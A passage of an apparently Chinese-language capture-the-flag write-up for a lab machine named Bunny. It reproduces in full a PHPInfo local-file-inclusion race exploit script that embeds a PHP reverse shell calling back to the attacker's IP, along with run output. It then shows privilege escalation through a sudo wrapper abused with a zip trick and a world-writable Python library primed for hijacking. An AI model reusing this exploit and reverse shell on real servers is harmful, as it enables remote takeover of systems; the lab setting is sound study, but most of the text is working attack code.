socket.gethostbyname(sys.argv[1])\n except socket.error, e:\n print "Error with hostname %s: %s" % (sys.argv[1], e)\n sys.exit(1)\n\n port=80\n try:\n port = int(sys.argv[2])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with port %d: %s" % (sys.argv[2], e)\n sys.exit(1)\n\n poolsz=10\n try:\n poolsz = int(sys.argv[3])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with poolsz %d: %s" % (sys.argv[3], e)\n sys.exit(1)\n\n print "Getting initial offset...", \n reqphp, tag, reqlfi = setup(host, port)\n offset = getOffset(host, port, reqphp)\n sys.stdout.flush()\n\n maxattempts = 1000\n e = threading.Event()\n l = threading.Lock()\n\n print "Spawning worker pool (%d)..." % poolsz\n sys.stdout.flush()\n\n tp = []\n for i in range(0,poolsz):\n tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))\n\n for t in tp:\n t.start()\n try:\n while not e.wait(1):\n if e.is_set():\n break\n with l:\n sys.stdout.write( "\\r% 4d \/ % 4d" % (counter, maxattempts))\n sys.stdout.flush()\n if counter >= maxattempts:\n break\n print\n if e.is_set():\n print "Woot! \\m\/"\n else:\n print ":("\n except KeyboardInterrupt:\n print "\\nTelling threads to shutdown..."\n e.set()\n\n print "Shuttin' down..."\n for t in tp:\n t.join()\n\nif __name__=="__main__":\n main()<\/code><\/pre>\n\u5c1d\u8bd5\u83b7\u53d6\u4e34\u65f6\u76ee\u5f55\u540d\u79f0\uff1a<\/p>\n
import requests\n\nurl = 'http:\/\/192.168.10.101\/phpinfo.php'\nfiles = {'file': open('test.txt', 'rb')}\n\nr = requests.post(url=url, files=files)\nprint(r.text)<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ python upload.py | grep tmp_name\n [tmp_name] => \/tmp\/php6ETEyu\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ sed -i 's\/\\[tmp_name\\] \\=>\/\\[tmp_name\\] =\\>\/g' phpinfolfi.py<\/code><\/pre>\n\u4fee\u6539\u4e0a\u8ff0\u5229\u7528\u811a\u672c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
#!\/usr\/bin\/python \nimport sys\nimport threading\nimport socket\n\ndef setup(host, port):\n TAG="Security Test"\n PAYLOAD="""%s\\r\n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.106'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;\n $write_a = null;\n $error_a = null;\n $shell = 'uname -a; w; id; \/bin\/sh -i';\n $daemon = 0;\n $debug = 0;\n\n \/\/\n \/\/ Daemonise ourself if possible to avoid zombies later\n \/\/\n\n \/\/ pcntl_fork is hardly ever available, but will allow us to daemonise\n \/\/ our php process and avoid zombies. Worth a try...\n if (function_exists('pcntl_fork')) {\n \/\/ Fork and have the parent process exit\n $pid = pcntl_fork();\n\n if ($pid == -1) {\n printit("ERROR: Can't fork");\n exit(1);\n }\n\n if ($pid) {\n exit(0); \/\/ Parent exits\n }\n\n \/\/ Make the current process a session leader\n \/\/ Will only succeed if we forked\n if (posix_setsid() == -1) {\n printit("Error: Can't setsid()");\n exit(1);\n }\n\n $daemon = 1;\n } else {\n printit("WARNING: Failed to daemonise. This is quite common and not fatal.");\n }\n\n \/\/ Change to a safe directory\n chdir("\/");\n\n \/\/ Remove any umask we inherited\n umask(0);\n\n \/\/\n \/\/ Do the reverse shell...\n \/\/\n\n \/\/ Open reverse connection\n $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n if (!$sock) {\n printit("$errstr ($errno)");\n exit(1);\n }\n\n \/\/ Spawn shell process\n $descriptorspec = array(\n 0 => array("pipe", "r"), \/\/ stdin is a pipe that the child will read from\n 1 => array("pipe", "w"), \/\/ stdout is a pipe that the child will write to\n 2 => array("pipe", "w") \/\/ stderr is a pipe that the child will write to\n );\n\n $process = proc_open($shell, $descriptorspec, $pipes);\n\n if (!is_resource($process)) {\n printit("ERROR: Can't spawn shell");\n exit(1);\n }\n\n \/\/ Set everything to non-blocking\n \/\/ Reason: Occsionally reads will block, even though stream_select tells us they won't\n stream_set_blocking($pipes[0], 0);\n stream_set_blocking($pipes[1], 0);\n stream_set_blocking($pipes[2], 0);\n stream_set_blocking($sock, 0);\n\n printit("Successfully opened reverse shell to $ip:$port");\n\n while (1) {\n \/\/ Check for end of TCP connection\n if (feof($sock)) {\n printit("ERROR: Shell connection terminated");\n break;\n }\n\n \/\/ Check for end of STDOUT\n if (feof($pipes[1])) {\n printit("ERROR: Shell process terminated");\n break;\n }\n\n \/\/ Wait until a command is end down $sock, or some\n \/\/ command output is available on STDOUT or STDERR\n $read_a = array($sock, $pipes[1], $pipes[2]);\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n \/\/ If we can read from the TCP socket, send\n \/\/ data to process's STDIN\n if (in_array($sock, $read_a)) {\n if ($debug) printit("SOCK READ");\n $input = fread($sock, $chunk_size);\n if ($debug) printit("SOCK: $input");\n fwrite($pipes[0], $input);\n }\n\n \/\/ If we can read from the process's STDOUT\n \/\/ send data down tcp connection\n if (in_array($pipes[1], $read_a)) {\n if ($debug) printit("STDOUT READ");\n $input = fread($pipes[1], $chunk_size);\n if ($debug) printit("STDOUT: $input");\n fwrite($sock, $input);\n }\n\n \/\/ If we can read from the process's STDERR\n \/\/ send data down tcp connection\n if (in_array($pipes[2], $read_a)) {\n if ($debug) printit("STDERR READ");\n $input = fread($pipes[2], $chunk_size);\n if ($debug) printit("STDERR: $input");\n fwrite($sock, $input);\n }\n }\n\n fclose($sock);\n fclose($pipes[0]);\n fclose($pipes[1]);\n fclose($pipes[2]);\n proc_close($process);\n\n \/\/ Like print, but does nothing if we've daemonised ourself\n \/\/ (I can't figure out how to redirect STDOUT like a proper daemon)\n function printit ($string) {\n if (!$daemon) {\n print "$string\n";\n }\n }\n\n ?> \n\n\\r""" % TAG\n REQ1_DATA="""-----------------------------7dbff1ded0714\\r\nContent-Disposition: form-data; name="dummyname"; filename="test.txt"\\r\nContent-Type: text\/plain\\r\n\\r\n%s\n-----------------------------7dbff1ded0714--\\r""" % PAYLOAD\n padding="A" * 5000\n REQ1="""POST \/phpinfo.php?a="""+padding+""" HTTP\/1.1\\r\nCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\\r\nHTTP_ACCEPT: """ + padding + """\\r\nHTTP_USER_AGENT: """+padding+"""\\r\nHTTP_ACCEPT_LANGUAGE: """+padding+"""\\r\nHTTP_PRAGMA: """+padding+"""\\r\nContent-Type: multipart\/form-data; boundary=---------------------------7dbff1ded0714\\r\nContent-Length: %s\\r\nHost: %s\\r\n\\r\n%s""" %(len(REQ1_DATA),host,REQ1_DATA)\n #modify this to suit the LFI script \n LFIREQ="""GET \/index.php?page=%s HTTP\/1.1\\r\nUser-Agent: Mozilla\/4.0\\r\nProxy-Connection: Keep-Alive\\r\nHost: %s\\r\n\\r\n\\r\n"""\n return (REQ1, TAG, LFIREQ)\n\ndef phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\n s.connect((host, port))\n s2.connect((host, port))\n\n s.send(phpinforeq)\n d = ""\n while len(d) < offset:\n d += s.recv(offset)\n try:\n i = d.index("[tmp_name] =>")\n fn = d[i+17:i+31]\n except ValueError:\n return None\n\n s2.send(lfireq % (fn, host))\n d = s2.recv(4096)\n s.close()\n s2.close()\n\n if d.find(tag) != -1:\n return fn\n\ncounter=0\nclass ThreadWorker(threading.Thread):\n def __init__(self, e, l, m, *args):\n threading.Thread.__init__(self)\n self.event = e\n self.lock = l\n self.maxattempts = m\n self.args = args\n\n def run(self):\n global counter\n while not self.event.is_set():\n with self.lock:\n if counter >= self.maxattempts:\n return\n counter+=1\n\n try:\n x = phpInfoLFI(*self.args)\n if self.event.is_set():\n break \n if x:\n print "\\nGot it! Shell created in \/tmp\/g"\n self.event.set()\n\n except socket.error:\n return\n\ndef getOffset(host, port, phpinforeq):\n """Gets offset of tmp_name in the php output"""\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host,port))\n s.send(phpinforeq)\n\n d = ""\n while True:\n i = s.recv(4096)\n d+=i \n if i == "":\n break\n # detect the final chunk\n if i.endswith("0\\r\\n\\r\\n"):\n break\n s.close()\n i = d.find("[tmp_name] =>")\n if i == -1:\n raise ValueError("No php tmp_name in phpinfo output")\n\n print "found %s at %i" % (d[i:i+10],i)\n # padded up a bit\n return i+256\n\ndef main():\n\n print "LFI With PHPInfo()"\n print "-=" * 30\n\n if len(sys.argv) < 2:\n print "Usage: %s host [port] [threads]" % sys.argv[0]\n sys.exit(1)\n\n try:\n host = socket.gethostbyname(sys.argv[1])\n except socket.error, e:\n print "Error with hostname %s: %s" % (sys.argv[1], e)\n sys.exit(1)\n\n port=80\n try:\n port = int(sys.argv[2])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with port %d: %s" % (sys.argv[2], e)\n sys.exit(1)\n\n poolsz=10\n try:\n poolsz = int(sys.argv[3])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with poolsz %d: %s" % (sys.argv[3], e)\n sys.exit(1)\n\n print "Getting initial offset...", \n reqphp, tag, reqlfi = setup(host, port)\n offset = getOffset(host, port, reqphp)\n sys.stdout.flush()\n\n maxattempts = 1000\n e = threading.Event()\n l = threading.Lock()\n\n print "Spawning worker pool (%d)..." % poolsz\n sys.stdout.flush()\n\n tp = []\n for i in range(0,poolsz):\n tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))\n\n for t in tp:\n t.start()\n try:\n while not e.wait(1):\n if e.is_set():\n break\n with l:\n sys.stdout.write( "\\r% 4d \/ % 4d" % (counter, maxattempts))\n sys.stdout.flush()\n if counter >= maxattempts:\n break\n print\n if e.is_set():\n print "Woot! \\m\/"\n else:\n print ":("\n except KeyboardInterrupt:\n print "\\nTelling threads to shutdown..."\n e.set()\n\n print "Shuttin' down..."\n for t in tp:\n t.join()\n\nif __name__=="__main__":\n main()<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ python2 phpinfolfi.py \nLFI With PHPInfo()\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nUsage: phpinfolfi.py host [port] [threads]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ python2 phpinfolfi.py 192.168.10.101 80 1000\nLFI With PHPInfo()\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nGetting initial offset... found [tmp_name] at 137075\nSpawning worker pool (1000)...\n 1000 \/ 1000\n:(\nShuttin' down...\n<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@bunny:\/$ sudo -l\nMatching Defaults entries for www-data on bunny:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on bunny:\n (chris) NOPASSWD: \/bin\/bash \/home\/chris\/lab\/magic *\n\n(remote) www-data@bunny:\/$ cat \/home\/chris\/lab\/magic\n#\/bin\/bash\n$1 $2 $3 -T -TT 'sh #'<\/code><\/pre>\nzip\u63d0\u6743chris<\/h3>\n
\u770b\u4e0a\u53bb\u50cf\u662f\u4f9d\u6b21\u4f20\u9012\u53c2\u6570\uff0c\u6700\u540e\u5206\u914d\u4f2a\u7ec8\u7aef\uff1f\u641c\u4e00\u4e0b\u76f8\u5173\u7684\u8d44\u6599\uff0c\u770b\u770b\u6709\u6ca1\u6709\u89e3\u91ca\uff1a<\/p>\n
\n\u8fd9\u91cc\u7f51\u65ad\u4e86\u4e00\u4e0b\u8def\u7531\u5668\u91cd\u65b0\u5206\u914d\u4e86\u4e00\u4e0bip\uff0c192.168.10.106 -> 192.168.10.102<\/p>\n<\/blockquote>\n
<\/div><\/p>\n\u627e\u5230\u4e86\u4e00\u4e2a\u7528\u6cd5\uff0c\u53c2\u8003 https:\/\/gtfobins.github.io\/gtfobins\/zip\/#sudo<\/a><\/p>\nsudo -u chris \/bin\/bash \/home\/chris\/lab\/magic zip $(mktemp -u) \/etc\/hosts<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h3>\n$ whoami;id\nchris\nuid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)\n$ bash\nchris@bunny:\/$ cd ~\nchris@bunny:~$ ls -la\ntotal 36\ndrwxr-xr-x 5 chris chris 4096 Jul 31 2021 .\ndrwxr-xr-x 3 root root 4096 Jul 31 2021 ..\nlrwxrwxrwx 1 root root 9 Jul 31 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 chris chris 220 Jul 31 2021 .bash_logout\n-rw-r--r-- 1 chris chris 3526 Jul 31 2021 .bashrc\ndrwx------ 3 chris chris 4096 Jul 31 2021 .gnupg\ndrwxr-xr-x 3 chris chris 4096 Jul 31 2021 .local\n-rw-r--r-- 1 chris chris 807 Jul 31 2021 .profile\ndrwxr-xr-x 2 chris chris 4096 Jul 31 2021 lab\n-rwx------ 1 chris chris 33 Jul 31 2021 user.txt\nchris@bunny:~$ cat user.txt \nb9c1575e8d8f934a4101fdbec2f711fe\nchris@bunny:~$ cd lab\/;ls -la\ntotal 12\ndrwxr-xr-x 2 chris chris 4096 Jul 31 2021 .\ndrwxr-xr-x 5 chris chris 4096 Jul 31 2021 ..\n-rw-r--r-- 1 chris chris 34 Jul 31 2021 magic\nchris@bunny:~$ find \/ -user chris -type f 2>\/dev\/null | grep -v proc\n\/home\/chris\/lab\/magic\n\/home\/chris\/.bash_logout\n\/home\/chris\/.bashrc\n\/home\/chris\/user.txt\n\/home\/chris\/.profile\n\/tmp\/zitSwNEH\nchris@bunny:~$ find \/ -group chris -type f 2>\/dev\/null | grep -v proc\n\/home\/chris\/lab\/magic\n\/home\/chris\/.bash_logout\n\/home\/chris\/.bashrc\n\/home\/chris\/user.txt\n\/home\/chris\/.profile\n\/tmp\/zitSwNEH\nchris@bunny:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\nchris@bunny:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/sudo\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nchris@bunny:~$ cd \/opt\nchris@bunny:\/opt$ ls -la\ntotal 12\ndrwxr-x--- 2 root chris 4096 Jul 31 2021 .\ndrwxr-xr-x 18 root root 4096 Jul 31 2021 ..\n-rw-r--r-- 1 root root 1993 Jul 31 2021 pendu.py\nchris@bunny:\/opt$ cat pendu.py\nimport random\n# library that we use in order to choose\n# on random words from a list of words\n\nname = input("What is your name? ")\n# Here the user is asked to enter the name first\n\nprint("Good Luck ! ", name)\n\nwords = ['rainbow', 'computer', 'science', 'programming',\n 'python', 'mathematics', 'player', 'condition',\n 'reverse', 'water', 'board', 'geeks']\n\n# Function will choose one random\n# word from this list of words\nword = random.choice(words)\n\nprint("Guess the characters")\n\nguesses = ''\n\n# any number of turns can be used here\nturns = 12\n\nwhile turns > 0:\n\n # counts the number of times a user fails\n failed = 0\n\n # all characters from the input\n # word taking one at a time.\n for char in word:\n\n # comparing that character with\n # the character in guesses\n if char in guesses:\n print(char)\n\n else:\n print("_")\n\n # for every failure 1 will be\n # incremented in failure\n failed += 1\n\n if failed == 0:\n # user will win the game if failure is 0\n # and 'You Win' will be given as output\n print("You Win")\n\n # this print the correct word\n print("The word is: ", word)\n break\n\n # if user has input the wrong alphabet then\n # it will ask user to enter another alphabet\n guess = input("guess a character:")\n\n # every input character will be stored in guesses\n guesses += guess\n\n # check input with the character in word\n if guess not in word:\n\n turns -= 1\n\n # if the character doesn\u2019t match the word\n # then \u201cWrong\u201d will be given as output\n print("Wrong")\n\n # this will print the number of\n # turns left for the user\n print("You have", + turns, 'more guesses')\n\n if turns == 0:\n print("You Loose")\nchris@bunny:\/opt$ find \/ -name random.py -type f 2>\/dev\/null\n\/usr\/lib\/python2.7\/random.py\n\/usr\/lib\/python3.7\/random.py\nchris@bunny:\/opt$ ls -la \/usr\/lib\/python2.7\/random.py\n-rw-r--r-- 1 root root 32457 Jul 31 2021 \/usr\/lib\/python2.7\/random.py\nchris@bunny:\/opt$ ls -la \/usr\/lib\/python3.7\/random.py\n-rw-r--rw- 1 root root 27557 Jul 31 2021 \/usr\/lib\/python3.7\/random.py<\/code><\/pre>\n\u53d1\u73b0python3\u7684\u8fd9\u4e2a\u662f\u53ef\u5199\u7684\uff0c\u5c1d\u8bd5\u8986\u5199\u4e00\u4e0b\uff0c\u4e0a\u9762\u8fd9\u4e2a\u811a\u672c\u5927\u6982\u7387\u662f\u4e00\u4e2a\u5b9a\u65f6\u4efb\u52a1\uff0c\u5230\u65f6\u95f4\u5c31\u53ef\u4ee5\u6267\u884c\u4e86\uff0c\u5148\u4e0a\u4f20pspy64\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u52ab\u6301\u4e00\u4e0brandom.py<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u62ff\u4e0b\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1km411m7T4\/<\/a><\/p>\n
![\"image-20240904130303073\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432526.png\")
<\/div><\/p>\n![\"image-20240904131943346\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432527.png\")
<\/div><\/p>\n![\"image-20240904134411636\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432528.png\")
<\/div><\/p>\n![\"image-20240904135629370\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432529.png\")
<\/div><\/p>\n![\"image-20240904141510536\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432530.png\")
<\/div><\/p>\n![\"image-20240904141710633\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432531.png\")
<\/div><\/p>\n![\"image-20240904142918477\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432532.png\")
<\/div><\/p>\n![\"image-20240904143217930\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432533.png\")
<\/div><\/p>\n